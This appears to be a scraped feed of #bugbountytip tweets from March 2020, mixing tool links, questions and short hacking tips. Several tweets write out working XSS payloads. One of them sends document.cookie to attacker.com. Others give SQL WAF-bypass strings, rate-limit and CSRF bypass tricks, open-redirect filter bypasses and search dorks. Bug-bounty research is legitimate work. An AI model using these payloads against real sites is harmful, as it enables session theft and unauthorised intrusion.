ghostlulz
@ghostlulz1337


2020-03-28 01:45:03
6 My company did some cool research using machine learning to predict vulnerabilities by looking at the words in a URL. More information on the blog: https://t.co/UeiBHIQOS3 #bugbountytip #BugBounty #bugbountytips #xss #ai #MachineLearning #infosec #appsec #redteam #pentest https://t.co/53ix3HGBrV
Offensive AI
@AiOffensive


2020-03-27 22:28:04
13 You know you can use machine learning to predict vulnerabilities based on the words in a URL. Check our awesome research by @ghostlulz1337 https://t.co/V1S2iThCb3 #bugbountytips #BugBounty #bugbountytip #xss #MachineLearning #ai #redteam #Pentesting #infosec #appsec https://t.co/UhUfJgSSiJ
Your Next Bug Tip
@YourNextBugTip


2020-03-27 17:58:47
0 #SelfXSS is pencil & u r John Wick This article ll teach u how to kill them all with a F pencil Self XSS #GodMode -Executing on priv. user acc -CSRF -Pre-Compromised Acc -Xss Jacking Gr8 Article by @hanspetrich🔥 https://t.co/JKMqNCUhHH #bugbountytips #bugbountytip #bugbounty
Prateek Thakare
@thakare_prateek


2020-03-27 17:29:52
3 #day3 #websecurity #bugbounty #100daystolearnandimprove Worked on recon process with @aish_kendle Continued with solving web security academy labs on web cache deception. #bugbounty #bugbountytip
Hack3rScr0lls
@hackerscrolls


2020-03-27 15:49:10
0 Do you track changes in JS static? Not yet? Tip by @igc_iv how to make it easier https://t.co/BBv0ydq90z [2/2] #BugBountyTip #OSINT #Pentest https://t.co/saFIApEL0e
Hack3rScr0lls
@hackerscrolls


2020-03-27 15:48:40
1 Do you track changes in JS static? Not yet? Tip by @igc_iv how to make it easier https://t.co/BBv0ydq90z [1/2] #BugBountyTip #OSINT #Pentest https://t.co/TaotKbGiBJ
Th3Alch3mist~
@Debian_Hunter


2020-03-27 13:07:09
0 @rahulnakum145 @YourNextBugTip Yes it's considered as self-xss , check if the site is changing your image name once they get uploaded ....or not . if no , then open the image link and check for the trigger....or else try for csrf.( plz correct me if I'm wrong 😅 ) #bugbountytip
Doga
@n33dm0n3y


2020-03-27 09:30:13
2 sqlmap found vulnerable parameter but i cant bypass to Akamai WAF should i report this for a bug ? #BugBounty #BugBountyTip #BugBountyTips #InfoSec
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-03-27 07:30:05
0 Do you still use tools like Hydra/Medusa for HTTP Basic Auth brute? Forget it! Use Burp Suite instead! #BugBounty #BurpSuite #BugBountyTip
Doga
@n33dm0n3y


2020-03-27 07:25:00
0 Hello guys anyone know Akamai WAF bypass for SQLi ==?? #BugBounty #BugBountyTip #BugBountyTips #InfoSec
srinivas_Uneek
@UneekVivek


2020-03-27 07:10:21
1 #bugbountytips #bugbountytip Lazy in Typing url encoded crlf In burp do this Rightclick on req click on "Url encode as you type" Hit enter u will to see crlf url encoded
Ammar Amer🇸🇾
@cry__pto


2020-03-27 04:02:19
1 network penetration testing GUIDE #bugbountytip #hacking #pentest #redteam https://t.co/gEo5YYA1Wy
Ankit Joshi
@ankit_2812


2020-03-27 01:54:53
1 Find out AWS S3 bucket name: 1) Find any CDN object URL 2) Append below string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc` and you will get the bucket name. #BugBounty #bugbountytip #bugbountytips #hackerone https://t.co/7pN5jM3bOy
Unde5able
@Unde5able


2020-03-27 01:43:04
2 #RECON SERIES LAZYRECON @NahamSec #bugbountytips #bugbounty #BugBountyTip #hacker #hacking #infosec #cybersecurity #Website #Pentesting #unde5able https://t.co/vfEqrwIqP0
M4HunT3r
@MohamedeAddar


2020-03-27 00:48:22
1 i look at this pic, every time i start hunting on a program. #BugBountyTip https://t.co/PEFnDahhu2
Dan Cimpean
@DanCimpean


2020-03-26 10:42:39
0 Only few organisations have a policy for #ethicalhacking - the @intigriti ´Your company’s security through the eyes of 10.000 hackers’ webinar going on now is very insightful! #BugBountyTip #HackWIthIntigriti #infosec #bugbounty RESPEKT! @securinti
Sam
@coffeejunkiee_


2020-03-26 03:31:29
0 Has anyone ever done a Subdomain take over through https://t.co/JUZH4dHBFm? #bug #BugBountyTip #BugBountyTip
Ankit Joshi
@ankit_2812


2020-03-26 02:48:42
1 @gr4h4m31 @WhatsApp Its definitely privacy bug, as if somebody mistakenly post the image and delete it immediately even though others can get that image. #BugBountyTip #bugbountytips #privacy #privacybug
Miracle
@Infosec_Marine


2020-03-25 21:25:45
0 #bugbountytips #BugBountyTip #bugbounty #bugcrowd @Hacker0x01 @Bugcrowd @zseano @Jhaddix @brutelogic @NahamSec @stokfredrik I hope I get a positive kinda answer .. Pls y'all I need this ... A cyberdad https://t.co/ufkkemL6AF
Miracle
@Infosec_Marine


2020-03-25 20:57:58
1 #bugbountytips #BugBountyTip #bugbounty #bugcrowd #hackerone #h1 #hacker @stokfredrik doesn't have to be u tho but you's my favorite I hope I get a positive kinda answer .. Pls y'all I need this ... A cyberdad https://t.co/ufkkemL6AF
Ammar Amer🇸🇾
@cry__pto


2020-03-25 20:57:05
3 Pentest-Tools.pdf https://t.co/dA8bqzIl17 Pentesting tools.pdf https://t.co/pxzSz5lk0T iOS Pentesting Tools.pdf https://t.co/agf6foX2rN Penetration Testing.pdf https://t.co/IkErIsZDdL Penetration Testing Academy NFC.pdf https://t.co/DfMfkEtNiI #Pentesting #BugBountyTip #OSINT
Udit Bhadauria (Hackcura)
@udit_thakkur


2020-03-25 20:07:11
1 Me and my friends @KritikaRaghuva6 @sengarharshit1 wrote a script that will help in exploiting API keys/tokens. The sole purpose of the script is to make API Key/Token Exploitation easy. https://t.co/U4YkrxqwSD #infosec #hacking #exploitation #Quarantine #bugbountytip #API
Yumi
@Yumi_Sec


2020-03-25 17:32:42
1 Facing filters during open redirect vulnerability exploitation ? Try this "Host/Split" payload to abuse of the Unicode normalization: #BugBounty #BugBountyTip #Infosec (credit to Jonathan Birch) https://t.co/qExdrIlase
Ceos3c
@ceos3c


2020-03-25 16:01:59
0 Third part of the Ethical Hacking Diaries is up. Check out what I have learned in Week #12. https://t.co/i4HfI0qYMR #bugbounty #BugBountyTip #ethicalhacking #cybersecurity
AkaaZaan
@AkaaZaan


2020-03-25 15:33:33
0 Hey bughunters, Which is the best Language Translation extension for Firefox.? Non-english sites are trouble while bughunting. #bugbountytip
INTIGRITI
@intigriti


2020-03-25 14:22:15
8 Hey hackers, if you use automation, make sure to throttle your requests or avoid spamming contact forms. The people on the other side will be thankful! 🙏 #BugBountyTip https://t.co/tBGYYSG2ME
Rafin Rahman Chy
@rafinrahmanchy


2020-03-25 13:19:30
2 Where to Find Exploits *Exploit Database(https://t.co/SsDpbiSqIX) *Kitploit *Packet Storm *CVE Sites *Github *Researcher blogs *Forums #WebSecurity #BugBountyTip #bugbountytips #netsec #appsec #Pentesting #PenTest #ethicalhacking #hacking #hacker #Exploit #cybersecurity #infosec
bb00x
@ihebhamad514


2020-03-25 13:11:30
0 Got a Self-XSS in email that returns an error without sanitizing characters on registration process (form is protected by a CSRF token that may prevent this issue being used on other users) Any Idea ? #BugBounty #bugbountytips #bugbountytip #xss
SinSin
@Sin_Khe


2020-03-25 12:06:52
6 Some of many ways to Quickly resolve subdomains #BugBounty #BugBountytips #BugBountyTip #infosec https://t.co/0HD9Jzntat
Hack3rScr0lls
@hackerscrolls


2020-03-25 09:28:08
4 How to disclose real IP behind cloudflare? Trick by @juwilie1337 (2/2) Links in pic: https://t.co/eGym22F8dv https://t.co/NT6cjjA2PU #BugBountyTip #OSINT #Pentest https://t.co/vR8JiSp7ET
Hack3rScr0lls
@hackerscrolls


2020-03-25 09:27:31
8 How to disclose real IP behind cloudflare? Trick by @juwilie1337 (1/2) Links in pic: https://t.co/eGym22F8dv https://t.co/NT6cjjA2PU #BugBountyTip #OSINT #Pentest https://t.co/r2UP4Drvsp
#000000
@nulllzero


2020-03-25 09:04:49
1 Few #XSS payloads which usually work #BugBountyTip 1. <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> 2. <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> 3. <svg<0x0c>onload=alert(1)><svg> 4. '><details/open/ontoggle=confirm(document.location)>
Tushar Kulkarni
@vk_tushar


2020-03-25 08:58:12
0 Wanna mass scan for URLs having Host Header Injection...Here's something I created with help of @krishanuchhabra https://t.co/swh9qk99t4 #bugbountytip #bugbountytool
siLLyDaDDy
@sillydadddy


2020-03-25 06:43:30
0 #bugbounty #BugBountyTip Thank God !!!! I got my first triage and bounty @Bugcrowd Thanks to the community. Its the result of your hardwork as well as mine !!!
Anas Mahmood 🇵🇰
@AnasIsHere


2020-03-24 14:48:09
0 @alicanact60 Once, I received a private invitation. Found an unpatched XSS at OBB. Reported that XSS, and the report was closed as Duplicate (as usual). Found a patched XSS at OBB. Bypassed the fix. Reported and earned bounty. 😎 #BugBountyTip
Anas Mahmood 🇵🇰
@AnasIsHere


2020-03-24 13:45:20
0 @alicanact60 I also check OBB reports while doing recon in first step. I think it's better to use the url directly ie (https://www.openbugbounty[dot]org/reports/domain/target[dot]com) without using any dork to view all the reports of your target on OBB. #BugBountyTip
SinSin
@Sin_Khe


2020-03-24 12:30:13
0 Host Header injection vulns are being found a lot lately, it was time for a Wrap-Up #BugBountyips #BugBountyTip #infosec https://t.co/lUvRnwOgeW
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-24 12:01:33
1 Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting Follow Us 💰💰👇👇👇 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone EDB-ID: 48245 CVE: 2020-10385 https://t.co/sV4KD5DCcC
path_finder_1
@Mayur_Chavan


2020-03-24 10:38:58
0 @zseano @omespino @Jhaddix @HusseiN98D Is there a way we can get the response of csrf ? When victim clicks on the link a json file gets downloaded.....anyway to capture this response ? #BugBountyTip #BugBounty #ThanksInAdvance
Shubham Sharma
@Shubham_pen


2020-03-24 08:37:57
2 A medical facility on standby to help test any coronavirus vaccine has been hit by a ransomware group that promised not. @rajchandel @ForbesTech @Forbes #cybersecurity #infosec #BugBountyTip #ransomware #Malware #COVID2019 #Coronaindia #TuesdayMotivation https://t.co/tN56A9cZtS
Yash Sodha 🌟
@y_sodha


2020-03-24 07:42:58
2 @kunalp94 Just enable both these rules to disable 304 Not Modified responses from the server entirely :) #BugBountyTip https://t.co/dMCyYYfYJg
xyele
@zeroxyele


2020-03-24 06:05:26
3 I've released a new tool for extracting values from file/s or URLs. https://t.co/tejiFXHXop #bugbounty #hackerone #bugbountytip #bugbountytips #togetherwehitharder https://t.co/I1wY315T53
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-03-24 05:57:18
0 A small demo how to brute HTTP Basic Auth with BurpSuite #BugBounty #BurpSuite #BugBountyTip https://t.co/uNyU11CR8O
Kamil Vavra
@vavkamil


2020-03-23 22:39:58
0 Every 6 months or so when one of my domains is about to expire, I report XSS to my registrar in exchange for free credits. Losing count, but I think this one is 3rd in a row. It's not much but it's honest work :) #bugbountytip #lifehack
andri👾
@andripwn


2020-03-23 21:44:31
2 hmmm, 10hours find it! #bugbountytip #bugbountytips https://t.co/7feJV5l3Jy
Hack3rScr0lls
@hackerscrolls


2020-03-23 14:27:10
0 A small demo how to brute HTTP Basic Auth with BurpSuite #BugBounty #BurpSuite #BugBountyTip https://t.co/HNS3aEyZIZ
Hack3rScr0lls
@hackerscrolls


2020-03-23 14:22:51
0 Do you still use tools like Hydra/Medusa for HTTP Basic Auth brute? Forget it! Use Burp Suite instead! #BugBounty #BurpSuite #BugBountyTip https://t.co/FPgurhruwI
INTIGRITI
@intigriti


2020-03-23 13:24:55
8 Sometimes, you're just one case away from a crit! Thanks for this amazing IDOR #BugBountyTip, @JohnH4X00r! https://t.co/bOzHrtfSUv
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-03-23 09:18:42
1 This one helped me recently to bypass a custom #XSS filter! #infosec #bugbounty #bugbountytip https://t.co/gSqMyIq9VG
Mohammed Adam
@iam_amdadam


2020-03-23 06:39:23
0 Uploaded some bugbounty poc findings in my channel. Do watch. 🤩 👉https://t.co/3orYXjafM9 #bugbounty #bugbountytip #poc #bughunting #cybersecurity #ethicalhacking https://t.co/JgT1NQ8FxF
Ankit Joshi
@ankit_2812


2020-03-23 03:18:41
0 Bugbounty tips#3 Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked Exmpls: http://1.0.0.1 → http://1.1 http://192.168.0.1 → http://192.168.1 #infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Unde5able
@Unde5able


2020-03-23 03:15:57
2 #RECON SERIES VULNERABILITY SCANNERS #bugbountytips #BugBounty #bugbountytip #Website #Pentesting #Scanner #acunetix #nessus #hacker #hacking #CyberSecurity #unde5able https://t.co/P1tMdheoqE
Udit Bhadauria (Hackcura)
@udit_thakkur


2020-03-22 21:01:00
10 Rate limit bypass: Add header/s with request X-Originating-IP: IP X-Forwarded-For: IP X-Remote-IP: IP X-Remote-Addr: IP X-Client-IP: IP X-Host: IP X-Forwared-Host: IP If bypass successful, & after a while blocking request again. Increment the last octet #infosec #bugbountytip
SinSin
@Sin_Khe


2020-03-22 17:39:27
0 @ome_mishra headers for this bypass(RateLimit) are: X-Forwarded-For: X-Forwarded-Host: #bugbountytip #bugbountytips #BugBounty
Ome Mishra (De.Hack3r)
@ome_mishra


2020-03-22 09:52:35
0 Try Rate limiting Bypass by X-Host: 127.0.0.1 .. If block after some request then try to increse the address from ...1 to ...2 and so on . Mine worked ..... #BugBountytips #bugbounty #bugcrowd #hackerone #bugbountytip #YourNextBugTip
Bug Bounty Poc
@Hackingig


2020-03-22 06:48:17
0 $3,500 for SSRF on slack https://t.co/2tj6Sc3H37 #bugbouny #slack #bugbountytip #BugBountyPoc
loopspell
@loopspell


2020-03-22 06:39:08
0 Awesome blog for SRT Members to hunt more efficiently on @SynackRedTeam Thanks @ozgur_bbh for this. #BugBounty #bugbountytip #BugBountytips https://t.co/vHAR7amfyi
Don Davis 💻
@QSoloX


2020-03-22 06:05:48
0 Trying to decide if I should start making youtube videos about writing automation scripts in python to solve CTF challenges.. hm what do you guys think? #hacking #bugbountytip #BugBountytips #infosec
niravsikotaria
@niravsikotaria


2020-03-22 05:52:30
0 SQLMAP Useful CMD #sqlmap #hack #websites #bug #BugBounty #bugbountytip https://t.co/LMmkw9v8gY
Th3Alch3mist~
@Debian_Hunter


2020-03-22 05:00:57
7 If you are a #bughunter then you must check out this awesome collection of tools gwen001. It's really really helpful while hunting and fuzzing a webapp. <3 #bugbounty #bugbountytip #infosec https://t.co/CBn1M32s2N
Minture
@minturebr


2020-03-22 02:58:18
0 #bugbounty #infosec #bugbountytip You can use %OD or %0A for Open Redirect filter bypass, example : //example.com [BLOCKED] /%0D/example.com [WORK], Also works for pseudo protocol : java%0a%0ascript%0d%0d:alert(0) #Remind https://t.co/z5JduGhnu2
tololovejoi
@tolo7010


2020-03-22 02:38:05
0 Answer: I typically try XXE at any endpoint that accepts XML format input. Sometimes you can use Burp repeater to try changing basic GET/POST params to XML format and the server could accept it, but you need to confirm if it is vulnerable. Good Luck and Happy Hacking! #bugbountytip https://t.co/hyF3tmPkqB
bing0o
@hack1lab


2020-03-21 23:25:49
2 simple bash script to check for status code for a list of domains, a better script with threads is here: https://t.co/ra2GGetXw4 #recon #bugbountytip #bugbountytool #bash https://t.co/9AFwQo8orr
Arif Khan
@payloadartist


2020-03-21 09:13:35
11 A simple one liner I use to enumerate sub-domains and open them in Firefox, coz it's oddly satisfying. Particularly useful to take a quick glance at sub-domains and take notes. #bugbounty #bugbountytip https://t.co/wtCVBQ42ex
MRM
@agamimaulana


2020-03-21 09:04:15
0 Remote Image Upload Leads to RCE (Inject Malicious Code to PHP-GD Image) https://t.co/0atk962YJZ #bugbounty #bugbountytips #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-21 06:31:10
0 Antivirus Bypassing For Fun and Profit Tutorial https://t.co/8M1vC1oIF6 If you want to learn Bug Bounty and Make your career in Cyber Security Follow #Hackdoor -💰💰💰 Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-21 06:27:04
0 inurl:”q=user/password” (for finding drupal cms ) If you want to learn Bug Bounty and Make your career in Cyber Security Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-21 06:25:18
1 “index of” inurl:wp-content/ (Identify Wordpress Website) If you want to learn Bug Bounty and Make your career in Cyber Security Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-21 06:23:24
2 Biggest Free Ebooks Collections https://t.co/Y5jUzpDhmv https://t.co/pXLE8Y13Pp #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
darkwayg
@thedarkwayg


2020-03-21 02:50:49
0 I earned $100 for my submission on @bugcrowd https://t.co/BJAHr0D7B8 #ItTakesACrowd By using /\ at the start of the link, you can bypass the open redirect filter. ?url=/\https://t.co/MvGIkcxzV3 #bugbountytip #bugbounty
Ankit Joshi
@ankit_2812


2020-03-21 02:33:44
0 Bugbounty tips#2 Try this MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip #bugbountytips #hackerone #HackThePandemic #hackers
Daher Mohamed
@DaherMohamed4


2020-03-20 21:12:58
0 Recently found a RXSS in captcha response Resolve captcha --> capture request --> change captcha response to XSS payload --> XSS trigger #BugBounty #BugBountyTip #BugBountyTips
Manas
@manas_hunter


2020-03-20 20:04:28
3 Rate Limit Bypass: Add this characters after the email or mobile %09, %00. Or Add an extra header in the request X-Forwarded-For: IP If it doesn't work then you can try adding multiple headers to bypass the function Thanks @zseano #infosec #bugbountytips #BugBountyTip #bugcrowd
👑RUSHII🇮🇳
@u1tran00b


2020-03-20 19:51:31
2 Rate Limit Bypass: Add this characters after the email or mobile %09, %00. Or Add an extra header in the request X-Forwarded-For: IP If it doesn't work then you can try adding multiple headers to bypass the function Thanks @zseano #infosec #bugbountytips #BugBountyTip #bugcrowd
Adam Langley
@adamtlangley


2020-03-20 17:43:09
0 I’ve seen a lot of people sign up for https://t.co/13ucD5B0eb and get only 1 or 2 flags. So the next challenge will have a walkthrough to help people improve their web app hacking skills #bugbountytip https://t.co/Ha7XodSoEj
Katie Paxton-Fear
@InsiderPhD


2020-03-20 14:47:19
3 #bugbountytip don’t read passively! Take notes on all the write ups, disclosures bugs, articles, techniques you read. You’re more likely to remember it AND if you come across a similar thing you can recall it from your notes and execute it! #BugBounty
Kartik Charande
@kartikraj909


2020-03-20 07:09:51
3 Which OS is best Arch Linux Vs Ubuntu #infosec #bugbountytip #linux @stokfredrik @NahamSec @TomNomNom @ehsahil @shehackspurple @Tabnexa
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-20 06:52:35
0 Nano CANBUS - #carhacking Follow Us 💰💰👇👇👇👇 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FJadZ9Drft
Shubham Sharma
@Shubham_pen


2020-03-20 05:01:11
3 FTP Penetration Testing.The File Transfer Protocol is a standard network protocol used for the transfer of file @rajchandel @ubuntu #infosec #linux #cybersecurity #bugbountytip #ftp #pentest #FridayMotivation https://t.co/zkTaiJoXuQ https://t.co/qtNu6ugLy8 https://t.co/KNlINvC9kp https://t.co/yXTNvrtBVc
Arif Khan
@payloadartist


2020-03-20 04:45:48
1 Found these amazing walkthroughs of Android vulns by @B3nac: Deeplink issues: https://t.co/Wr3uYOc3zb Exploitation of exported activities (OOS on some programs, nevertheless an interesting watch) https://t.co/334PGTCTBk #bugbountytip #bugbounty
srinivas_Uneek
@UneekVivek


2020-03-20 02:41:00
1 #BurpsuiteTips #bugbountytip BURPSUITE SHORT CUTS KEYS: To on off intercept = ctrl + t, forward request from proxy Ctrl + f Send Request to Repeater : Ctrl + R Send Request to Intruder : Ctrl +i #infosec
GokhanGK
@gkhck_


2020-03-19 22:53:44
1 The biggest bug bounty tips here! Get your future with that tips. https://t.co/9X6KtWI5Ma @Hacker0x01 #bugbountytip #infosec #bugbountytips
Asะฝัฮฑff
@MrAshraff_


2020-03-19 18:19:23
0 Apart from VPS, do I need to use VPN as a bug hunter #bugbountytip #bugbountytips #togetherwehitharder #CyberSecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-19 16:32:02
2 Thanks for the Swag 🔥🔥 @Hacker0x01 #TogetherWeHitHarder #hackerone Follow Us 💰💰👇👇👇👇 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/62TjnXsFj5
Arif Khan
@payloadartist


2020-03-19 10:51:23
1 Some awesome wordlists for fuzzing and dir bruteforce: (By @nullenc0de) https://t.co/yRz3fI6D7U https://t.co/M1k4IXLkTn (By @Jhaddix) https://t.co/mWwzl6jxL3 https://t.co/n1buLliuqU (By @i_bo0om https://t.co/papuednVH6 https://t.co/9xhfvVJSJN #bugbounty #bugbountytip
Sunil
@Sunilkande1137


2020-03-19 10:43:12
0 My ever funny 2FA Bypass bug https://t.co/bNcO5qbhPt #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-19 10:06:45
1 Follow Us 💰💰👇👇👇👇 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/iAN3PLZ5ze
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-19 09:59:04
0 🔥🏆🔥 DevSecOps Online Training Batches - Start 25-March-2020🏆 Strength : 3 💵 Reachout To Join 💵hackdoor.trainings[at]gmail(dot)com 🔥🔥🔥🔥🔥🔥🔥 Follow Us 💰💰👇👇👇👇 https://t.co/iNczOcGmCt https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/lkHIhLspJr
Vishnu
@k_v0


2020-03-19 03:59:11
0 https://t.co/CjPR6PjGtV… Shout out to another great @j3ssiejjj tool!! #BugBounty #bugbountytip #bugcrowd https://t.co/bvgnKRd8rY
The Notorious B.E.E. 🐝
@securibee


2020-03-19 02:40:55
0 I saw this tweet and it invigorated me. Thought I'd share. "Success is the sum of small efforts, repeated day in and day out." - Robert Collier #bugbountytip #LifeLessons #NeverGiveUp https://t.co/DS7wXokzb8
Unde5able
@Unde5able


2020-03-19 02:08:20
1 #RECON SERIES GITHUB RECON #bugbountytip #bugbountytips #bugbounty #infosec #informationtechnology #github #recon #Website #Pentesting #hacking #hacker #cybersecurity #computer #unde5able https://t.co/3LvTUiLaTk
Noble Six
@NobleSiXSS


2020-03-19 00:33:33
0 Aws bucket not taken -> stored xss -> account takeover = $$$ #BugBounty #BugBountyTip #BugBountyTips
Yadhavi
@PrincessYadhavi


2020-03-18 20:36:27
0 Double up your defenses. There will be a lot of bored and stupid scriptkiddies target your systems in this quarantine time. #bugbountytip #bugbountytips #infosec
The Bug Bounty Podcast
@bounty_podcast


2020-03-18 19:23:50
10 Episode #3 - We sit down with @NahamSec to talk about streaming, all things community, doing deep work, mass recon and the power of long term collaboration. Listen on https://t.co/ojVfVynYPD #bountylife #bugbounty #bugbountypodcast #bugbountytip #bbp
ALL ABOUT HACKER
@AboutHacking


2020-03-18 16:24:50
0 How to Start Bug Bounty https://t.co/89AsK9PbQd #bugbounty #bugbountytips #bugbountytip #infosec
Bogdan Bodishtyanu
@xalerafera


2020-03-18 15:49:49
0 XSS Double Sh0t⚡️- in one request #BugBounty #bugbountytip #bugbountytips https://t.co/nyoSUJwz6g
eissen5c
@eissen5c


2020-03-18 14:53:01
0 cloudflare bypass XSS using location with cookie value payload : %3Cp%20style=overflow:auto;font-size:999px%20onscroll=x=location=%27http://attacker.com?cookie=%27+document.cookie%3EAAA%3Cx/id=y%3E%3C/p%3E #bugbountytip #xss #bugbounty
vdvcoder | Bathrobe | Olivier
@vdvcoder


2020-03-18 14:14:03
0 @intigriti Always do a dnsresolve of https://t.co/vvYzKMu4YB and check/surf to the IP. Sometimes you get another application than the https://t.co/vvYzKMu4YB application. that can have some sensitive data. #bugbountytip
Cr33pb0y
@cr33pb0y


2020-03-18 10:29:16
0 @intigriti If you got a duplicate bug, you have to monitor it until it will be resolved. When this will happen, recheck your bug. You can obtain a great surprise. #bugbountytip
CyberTaters
@CyberTaters


2020-03-18 10:04:41
2 #Bug #Bounty #Tips part 5 and 6! #infosec #informationsecurity #infosecurity #potato #PotatoSecurity #PotatoSec #ethicalmashing #pentesting #bugbountytip #BugBounty #masherone #bugcrowd #mashed #appsec #webappsec #webapp #bbtips #PenTest https://t.co/2zeiCqd3wb
Seasoned Cyber Security Professionals
@scspcommunity


2020-03-18 10:04:18
5 #Bug #Bounty #Tips part 5 and 6! #infosec #informationsecurity #infosecurity #cyber #CyberSecurity #CyberSec #ethicalhacking #pentesting #bugbountytip #BugBounty #hackerone #bugcrowd #hacked #appsec #webappsec #webapp #bbtips #PenTest https://t.co/Emnwo8BMsC
👑RUSHII🇮🇳
@u1tran00b


2020-03-18 05:01:34
6 Bypass CSRF Protection: Using a CSRF token from different accounts Replacing the values of the same length Clickjacking Change the request method Delete the token param or send a blank token Remove the referer header #WorkFromHome #infosec #bugbountytips #BugBountyTip #bugcrowd
Ankit Joshi
@ankit_2812


2020-03-18 02:32:24
0 Try this @shodanhq query tip#1: If "ssl:<domain>" doesn't return anything try following: 1. "https://t.co/E02LCIPCPJ:<domain>" 2. "https://t.co/E02LCIPCPJ:<domain> 200 OK" #bugbountytips #BugBounty #bugbountytip #hackers #hackerone #OSINT #shodan
Your Next Bug Tip
@YourNextBugTip


2020-03-17 17:15:21
1 Can you exploit #sqli in LIMIT CLAUSE? Pretty TRICKY but @iamnoooob found a way, he created 127 items to exploit it (Blind Sqli) Why? Bc ASCII numbers are from 0-127 Clever Hack by @iamnoooob💯 #bugbountytips #bugbountytip #bugbounty https://t.co/tMOlQiDx2n
Nick || hunt4p1zza
@ngkogkos


2020-03-17 12:14:07
4 When fuzzing APIs w/ GET they may return "405 Method Not Allowed" but not always. Fuzz APIs w/ @Burp_Suite Intruder using Cluster bomb attack (config shown in the screenshots) to pick up actions over diff. HTTP methods. #burpsuitetip #bugbountytip https://t.co/coMFhgGe8t
SI9INT
@si9int


2020-03-16 19:22:32
0 This one helped me recently to bypass a custom #XSS filter! #infosec #bugbounty #bugbountytip https://t.co/UYXlQbkLGK
srinivas_Uneek
@UneekVivek


2020-03-16 16:19:39
0 #Bugbountytip. Remember if u Dint Succeed in Finding Vulnerability in webapp try to find in its api. like idor, info disclosure.
Mohammed Shine
@MohammedShine8


2020-03-16 16:16:24
0 Use the command 'tee' to see and save the output file at the same time. Eg: nmap 127.0.0.1 | tee -a output.txt dirsearch -u https://t.co/z4XPhGdw4j -e php | tee -a output.txt #BugBounty #bugbountytip #linuxtip #Pentesting
Hussein Daher
@HusseiN98D


2020-03-16 13:49:33
0 #Bugbountytip Read the documentation and try to craft the requests when you don't have access to the Web Gui https://t.co/KB4NAIvBOO
Life Pro Tips
@Life_P_Tips


2020-03-16 07:41:06
0 RT @securibee: "The best time to plant a tree is twenty years ago. The second best time is now." #BugBountyTip #TogetherWeRise #covid19 #lifeprotips
Raju Kumar
@MrCyberwarrior


2020-03-16 05:45:23
0 Email verification bypass 1. Log in with Facebook does not have an email. 2.The site asks for an email to join. Enter someone else email. 3. There was no validation at serverside to verify email at this point. Account successfully registered with the provided email. #Bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-03-16 03:41:33
1 #bugbountytip So at auth, convert the POST request into JSON or XML format, Sometime dev leave them open and these not protected from injections and if XML comes into play then try XXE @ShauryaSharma05 have nice stuff, Keep it up bruh🤘 #bugbounty #bugbountytip https://t.co/kN17dVSIou
Ankit Joshi
@ankit_2812


2020-03-16 02:07:58
